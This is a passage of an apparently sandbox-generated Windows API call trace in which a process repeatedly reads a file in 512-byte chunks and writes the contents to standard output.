[0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] GetFileType (hFile=0x50) returned 0x1 [0145.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.379] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0145.380] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.380] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] GetFileType (hFile=0x50) returned 0x1 [0145.380] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.380] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.381] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.381] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.381] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.381] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType 
(hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.382] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.382] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.383] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.383] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.383] GetFileType (hFile=0x50) returned 0x1 [0145.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, 
lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.384] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.384] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] GetFileType (hFile=0x50) returned 0x1 [0145.384] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.384] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, 
lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] GetFileType (hFile=0x50) returned 0x1 [0145.385] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.385] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.385] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.385] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.386] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.386] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 
[0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.387] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.387] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.387] GetFileType (hFile=0x50) returned 0x1 [0145.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] GetFileType (hFile=0x50) returned 0x1 [0145.388] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.388] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: 
lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.388] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.388] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.388] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.389] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.389] GetFileType (hFile=0x50) returned 0x1 [0145.389] _get_osfhandle 
